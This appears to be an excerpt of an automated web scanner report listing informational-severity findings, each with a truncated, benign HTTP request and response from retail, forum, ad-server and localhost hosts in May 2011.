GET /fingerhut/css/sifr Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2618 Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B2A6DA49F var bellgothicbold = { src: '/fingerhut/fonts var bellgothic = { src: '/fingerhut/fonts //sIFR.useStyleCheck = true; sIFR.fromLocal = true; // Nex ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /js/financial-snapshot |
GET /js/financial-snapshot Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Language: en Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:18 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 5659 Date: Mon, 16 May 2011 01:31:18 GMT Connection: keep-alive var financialSnapshot = function() { $(function() { financialSnapshot.init(); }); var _p = { rColIndex : null, loadAsset : function() { if ( $( "#financialSnapshot" ).le ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /js/persistent_cart.jsp |
GET /js/persistent_cart.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:16 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 11446 Date: Mon, 16 May 2011 01:31:16 GMT Connection: keep-alive Set-Cookie: JSESSIONID=3BBDC68C4 var persistentCartCommands = new Array(8); persistentCartCommands[0] = '/checkout/universal_cart persistentCartCommands[1] = '/checkout/add_item_pc persistentCartCommands[2] = '/che ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /js/sifr.jsp |
GET /js/sifr.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:23 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 29365 Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive Set-Cookie: JSESSIONID=3D026D7D1 /************************ scalable Inman Flash Replacement (sIFR) version 3, revision 436. Copyright 2006 ... 2008 Mark Wubben, <http://nov ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.footlocker.com |
Path: | /ns/hp/css/images/FL |
GET /ns/hp/css/images/FL Host: www.footlocker.com Proxy-Connection: keep-alive Referer: http://www.footlocker.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SSLC=web%2D23; USER_PROFILE=XntuC2p |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=iso-8859-1 Content-Length: 15 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:44:01 GMT Connection: close File not found. |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/customavatars |
GET /forums/customavatars Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 2078 Content-Type: image/gif Last-Modified: Sun, 14 Nov 2010 15:10:40 GMT Accept-Ranges: bytes ETag: "1233d319e84cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:13 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/customavatars |
GET /forums/customavatars Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 4562 Content-Type: image/gif Last-Modified: Sun, 14 Nov 2010 15:11:01 GMT Accept-Ranges: bytes ETag: "c041ec25e84cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:19 GMT ......JFIF.....H.H.....C. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/customavatars |
GET /forums/customavatars Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 2021 Content-Type: image/gif Last-Modified: Sun, 14 Nov 2010 15:11:09 GMT Accept-Ranges: bytes ETag: "041fd2ae84cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:20 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/customavatars |
GET /forums/customavatars Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 1980 Content-Type: image/gif Last-Modified: Sun, 14 Nov 2010 15:12:32 GMT Accept-Ranges: bytes ETag: "a2d25b5ce84cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:14 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/customavatars |
GET /forums/customavatars Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 10862 Content-Type: image/gif Last-Modified: Sun, 14 Nov 2010 15:09:15 GMT Accept-Ranges: bytes ETag: "8a8bf9e6d84cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:08 GMT ......JFIF.....H.H..... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/customavatars |
GET /forums/customavatars Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 8485 Content-Type: image/gif Last-Modified: Sun, 14 Nov 2010 15:09:40 GMT Accept-Ranges: bytes ETag: "8e15f8f5d84cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:18 GMT ......JFIF.....`.`..... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 33729 Content-Type: image/gif Last-Modified: Sun, 06 Mar 2011 22:33:48 GMT Accept-Ranges: bytes ETag: "fa75768f4edccb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:04 GMT ......JFIF.....H.H..... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 14252 Content-Type: image/gif Last-Modified: Mon, 07 Feb 2011 15:59:19 GMT Accept-Ranges: bytes ETag: "52447dfadfc6cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:22 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 22944 Content-Type: image/gif Last-Modified: Fri, 23 Jul 2010 00:58:06 GMT Accept-Ranges: bytes ETag: "6043511c22acb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:19 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 22945 Content-Type: image/gif Last-Modified: Wed, 01 Sep 2010 22:02:26 GMT Accept-Ranges: bytes ETag: "227c3a5d214acb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:24 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 24784 Content-Type: image/gif Last-Modified: Sun, 07 Nov 2010 19:14:00 GMT Accept-Ranges: bytes ETag: "3273e3eeaf7ecb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:20 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 18508 Content-Type: image/gif Last-Modified: Tue, 13 Jul 2010 15:51:13 GMT Accept-Ranges: bytes ETag: "5e4e7938a322cb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:22 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 29607 Content-Type: image/gif Last-Modified: Fri, 29 Apr 2011 09:13:40 GMT Accept-Ranges: bytes ETag: "1ae929bb4d6cc1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:08 GMT ......JFIF............... ..... . ........... ... ........,................ ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.passporte |
Path: | /forums/signaturepics |
GET /forums/signaturepics Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Content-Length: 24143 Content-Type: image/gif Last-Modified: Fri, 05 Nov 2010 22:39:29 GMT Accept-Ranges: bytes ETag: "e734e04e3a7dcb1:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:21:19 GMT ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.restorati |
Path: | /sitewide/includes/footer |
GET /sitewide/includes/footer Host: www.restorationhardware Proxy-Connection: keep-alive Referer: http://www.restorati X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=Wlhqnnp+ |
HTTP/1.1 200 OK X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: version=QVRHUGxhdGZv Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2371 Date: Mon, 16 May 2011 01:39:47 GMT Connection: close Cache-Control: max-age=0 Expires: Mon, 16 May 2011 01:39:47 GMT <h3 class="brand">Email Signup</h3> <form action="/customer-service ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.toshibadirect |
Path: | /js/coremetrics |
GET /js/coremetrics Host: www.toshibadirect.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BV_IDS=cccdadfdidkkk |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:40:33 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT Accept-Ranges: bytes Content-Length: 1064 Content-Type: text/plain <!-- function callCMEventTag(){} function cmCreateConversionEv function cmCreateCouponOrderTag(){ function cmCreateCouponTag(){} function cmCreateDefaultPagev function cmCreateErr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.bluelithium |
Path: | /st |
GET /st?ad_type=ad&ad_size Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:23:04 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 16 May 2011 01:23:04 GMT Pragma: no-cache Content-Length: 4293 Age: 0 Proxy-Connection: close /* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://localhost:50386 |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: localhost:50386 Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Cassini/4.1.1395.0 Date: Mon, 16 May 2011 00:09:32 GMT Content-Length: 1203 Connection: Close <html> <head> <title>Not Found</title> <style> body {font-family:"Verdana" p {font-family:"Verdana" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://localhost:50386 |
Path: | /hoyt.net |
GET /hoyt.net HTTP/1.1 Host: localhost:50386 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Cassini/4.1.1395.0 Date: Mon, 16 May 2011 00:09:32 GMT Content-Length: 1203 Connection: Close <html> <head> <title>Not Found</title> <style> body {font-family:"Verdana" p {font-family:"Verdana" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://localhost:50386 |
Path: | /hoyt.net/sitefinity |
GET /hoyt.net/sitefinity HTTP/1.1 Host: localhost:50386 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Cassini/4.1.1395.0 Date: Mon, 16 May 2011 00:09:59 GMT Content-Length: 1203 Connection: Close <html> <head> <title>Not Found</title> <style> body {font-family:"Verdana" p {font-family:"Verdana" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pcm1.map.pulsemgr |
Path: | /uds/pc |
GET /uds/pc?ptnr=21272&sig Host: pcm1.map.pulsemgr.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 43 Date: Mon, 16 May 2011 01:20:15 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 220 Date: Sun, 15 May 2011 20:26:45 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.sonystyle.com Cookie: JSESSIONID=0000e Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Content-Length: 161 Date: Sun, 15 May 2011 21:20:23 GMT Connection: close Cache-Control: no-cache Pragma: no-cache <html><head><title |